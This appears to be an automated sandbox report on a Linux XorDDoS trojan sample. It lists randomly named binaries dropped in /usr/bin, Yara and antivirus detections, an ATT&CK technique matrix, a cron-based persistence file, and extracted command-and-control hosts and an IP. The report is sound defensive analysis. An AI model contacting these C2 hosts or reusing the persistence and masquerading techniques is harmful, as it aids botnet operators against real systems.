Source: /usr/bin/sxruomujjd (PID: 6334)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/sxruomujjd (PID: 6337)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/sxruomujjd (PID: 6339)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/qrabekbstr (PID: 6346)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/qrabekbstr (PID: 6349)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/qrabekbstr (PID: 6352)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/qrabekbstr (PID: 6354)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/qrabekbstr (PID: 6357)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/sotpizdssr (PID: 6365)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/sotpizdssr (PID: 6368)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/sotpizdssr (PID: 6371)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/sotpizdssr (PID: 6373)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/sotpizdssr (PID: 6376)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gnmftoxpza (PID: 6382)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gnmftoxpza (PID: 6385)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gnmftoxpza (PID: 6388)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gnmftoxpza (PID: 6390)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gnmftoxpza (PID: 6393)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/iulapzbfpq (PID: 6399)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/iulapzbfpq (PID: 6402)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/iulapzbfpq (PID: 6405)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/iulapzbfpq (PID: 6407)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/iulapzbfpq (PID: 6411)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/posifzmmhg (PID: 6419)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/posifzmmhg (PID: 6422)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/posifzmmhg (PID: 6424)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/posifzmmhg (PID: 6427)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/posifzmmhg (PID: 6430)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/buxftyvhwp (PID: 6436)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/buxftyvhwp (PID: 6439)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/buxftyvhwp (PID: 6441)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/buxftyvhwp (PID: 6444)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/buxftyvhwp (PID: 6446)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/wvbxepjyjx (PID: 6453)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/wvbxepjyjx (PID: 6455)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/wvbxepjyjx (PID: 6459)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/wvbxepjyjx (PID: 6462)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/wvbxepjyjx (PID: 6464)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/eqznayducj (PID: 6470)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/eqznayducj (PID: 6473)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/eqznayducj (PID: 6475)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/eqznayducj (PID: 6479)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/eqznayducj (PID: 6482)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ibkljkndlm (PID: 6487)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ibkljkndlm (PID: 6492)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ibkljkndlm (PID: 6495)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ibkljkndlm (PID: 6497)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ibkljkndlm (PID: 6500)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/oarnkspbbo (PID: 6507)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/oarnkspbbo (PID: 6510)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/oarnkspbbo (PID: 6513)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/oarnkspbbo (PID: 6516)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/oarnkspbbo (PID: 6518)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ungjrprpkb (PID: 6524)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ungjrprpkb (PID: 6527)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ungjrprpkb (PID: 6530)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ungjrprpkb (PID: 6533)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ungjrprpkb (PID: 6535)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gdmrzwxnqy (PID: 6541)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gdmrzwxnqy (PID: 6544)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gdmrzwxnqy (PID: 6547)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gdmrzwxnqy (PID: 6549)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gdmrzwxnqy (PID: 6553)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/eperfpvgsg (PID: 6558)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/eperfpvgsg (PID: 6561)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/eperfpvgsg (PID: 6563)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/eperfpvgsg (PID: 6565)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/eperfpvgsg (PID: 6567)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/kfgwgvyckw (PID: 6576)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/kfgwgvyckw (PID: 6578)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/kfgwgvyckw (PID: 6581)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/kfgwgvyckw (PID: 6583)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/kfgwgvyckw (PID: 6586)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/hymrnjeilx (PID: 6593)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/hymrnjeilx (PID: 6595)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/hymrnjeilx (PID: 6598)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/hymrnjeilx (PID: 6601)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/hymrnjeilx (PID: 6604)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/rjhjbiwpsr (PID: 6613)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/rjhjbiwpsr (PID: 6615)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/rjhjbiwpsr (PID: 6618)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/rjhjbiwpsr (PID: 6620)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/rjhjbiwpsr (PID: 6623)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/nopfevkjnk (PID: 6630)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/nopfevkjnk (PID: 6632)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/nopfevkjnk (PID: 6635)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/nopfevkjnk (PID: 6637)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/nopfevkjnk (PID: 6640)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/vjejifjmgs (PID: 6647)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/vjejifjmgs (PID: 6649)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/vjejifjmgs (PID: 6651)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/vjejifjmgs (PID: 6654)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/vjejifjmgs (PID: 6656)	Queries kernel information via 'uname':	Jump to behavior

Source: HaJTqGiPpD, 6560.1.000000000880c000.000000000882e000.rw-.sdmp	Binary or memory string: /usr/bin/vmtoolsd
Source: HaJTqGiPpD, 6560.1.000000000880c000.000000000882e000.rw-.sdmp	Binary or memory string: /usr/bin/vmtoolsdd]ed4fa47433baee88884e2d7de7c/user-1000.journal60c449319d89119d4e848c81-000000000000a31c-0005cc2d7c3bf733.journal`

Remote Access Functionality

Yara detected XorDDoS Bot

Source: Yara match	File source: HaJTqGiPpD, type: SAMPLE
Source: Yara match	File source: 6233.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6512.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6480.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6367.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6526.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6454.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6300.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6426.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6331.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6429.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6232.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6370.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6509.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6280.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6534.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6404.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6517.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6440.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6338.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6387.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6443.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6438.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6463.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6384.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6229.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6283.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6328.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6423.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6231.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6445.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6272.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6333.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6336.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6392.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6560.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6514.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6269.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6303.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6266.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6356.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6381.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6409.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6493.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6306.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6421.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6389.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6310.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6532.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6472.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6375.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6550.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6298.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6288.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6486.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6229, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6231, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6232, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6233, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6263, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6266, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6269, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6272, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6274, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6283, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6285, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6291, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6298, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6300, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6303, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6306, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6310, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6328, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6331, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6333, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6336, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6338, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6345, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6348, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6351, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6353, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6356, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6364, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6367, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6370, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6375, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6381, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6384, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6387, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6389, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6392, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6398, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6401, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6406, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6409, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6418, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6421, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6423, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6426, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6429, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6435, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6438, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6440, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6443, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6445, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6452, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6454, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6457, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6461, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6463, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6469, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6474, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6477, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6480, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6486, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6491, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6493, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6499, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6506, type: MEMORYSTR
Source: Yara match	File source: /usr/bin/ibkljkndlm, type: DROPPED
Source: Yara match	File source: /usr/lib/libudev.so, type: DROPPED
Source: Yara match	File source: /usr/bin/qrabekbstr, type: DROPPED
Source: Yara match	File source: /usr/bin/kigdktzeum, type: DROPPED
Source: Yara match	File source: /usr/bin/eqznayducj, type: DROPPED
Source: Yara match	File source: /usr/bin/wvbxepjyjx, type: DROPPED
Source: Yara match	File source: /usr/bin/sxruomujjd, type: DROPPED
Source: Yara match	File source: /usr/bin/buxftyvhwp, type: DROPPED
Source: Yara match	File source: /usr/bin/iulapzbfpq, type: DROPPED
Source: Yara match	File source: /usr/bin/gnmftoxpza, type: DROPPED
Source: Yara match	File source: /usr/bin/posifzmmhg, type: DROPPED
Source: Yara match	File source: /usr/bin/sotpizdssr, type: DROPPED
Source: Yara match	File source: /usr/bin/becqudbgme, type: DROPPED
Source: Yara match	File source: /usr/bin/mizdkrdyqj, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	Windows Management Instrumentation	1 Systemd Service	1 Systemd Service	12 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Scripting	Boot or Logon Initialization Scripts	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 File Deletion	Security Account Manager	1 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	14 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Malware Configuration

Threatname: XorDDoS

{"C2 list": ["http://aaa.dsaj2a.org/config.rar\u00007.com:25", "ww.dnstells.com:25"]}

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label
HaJTqGiPpD	72%	ReversingLabs	Linux.Trojan.XorDDoS
HaJTqGiPpD	100%	Avira	LINUX/Xorddos.cona
HaJTqGiPpD	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
/usr/bin/posifzmmhg	100%	Avira	LINUX/Xorddos.cona
/usr/bin/sxruomujjd	100%	Avira	LINUX/Xorddos.cona
/usr/bin/sotpizdssr	100%	Avira	LINUX/Xorddos.cona
/usr/bin/kigdktzeum	100%	Avira	LINUX/Xorddos.cona
/usr/bin/ibkljkndlm	100%	Avira	LINUX/Xorddos.cona
/usr/lib/libudev.so	100%	Avira	LINUX/Xorddos.cona
/usr/bin/wvbxepjyjx	100%	Avira	LINUX/Xorddos.cona
/usr/bin/eqznayducj	100%	Avira	LINUX/Xorddos.cona
/usr/bin/qrabekbstr	100%	Avira	LINUX/Xorddos.cona
/usr/bin/mizdkrdyqj	100%	Avira	LINUX/Xorddos.cona
/usr/bin/iulapzbfpq	100%	Avira	LINUX/Xorddos.cona
/usr/bin/gnmftoxpza	100%	Avira	LINUX/Xorddos.cona
/usr/bin/becqudbgme	100%	Avira	LINUX/Xorddos.cona
/usr/bin/buxftyvhwp	100%	Avira	LINUX/Xorddos.cona
/usr/bin/posifzmmhg	100%	Joe Sandbox ML
/usr/bin/sxruomujjd	100%	Joe Sandbox ML
/usr/bin/sotpizdssr	100%	Joe Sandbox ML
/usr/bin/kigdktzeum	100%	Joe Sandbox ML
/usr/bin/ibkljkndlm	100%	Joe Sandbox ML
/usr/lib/libudev.so	100%	Joe Sandbox ML
/usr/bin/wvbxepjyjx	100%	Joe Sandbox ML
/usr/bin/eqznayducj	100%	Joe Sandbox ML
/usr/bin/qrabekbstr	100%	Joe Sandbox ML
/usr/bin/mizdkrdyqj	100%	Joe Sandbox ML
/usr/bin/iulapzbfpq	100%	Joe Sandbox ML
/usr/bin/gnmftoxpza	100%	Joe Sandbox ML
/usr/bin/becqudbgme	100%	Joe Sandbox ML
/usr/bin/buxftyvhwp	100%	Joe Sandbox ML
/etc/cron.hourly/gcc.sh	42%	ReversingLabs	Linux.Network.Xor
/usr/lib/libudev.so	72%	ReversingLabs	Linux.Trojan.XorDDoS

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
ww.dnstells.com:25	100%	Avira URL Cloud	malware
http://www.gnu.org/software/libc/bugs.html	0%	Avira URL Cloud	safe
http://aaa.dsaj2a.org/config.rar	0%	Avira URL Cloud	safe
http://aaa.dsaj2a.org/config.rar7.com:25	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
aaa.dsaj2a.org	23.253.46.64	true	true	unknown
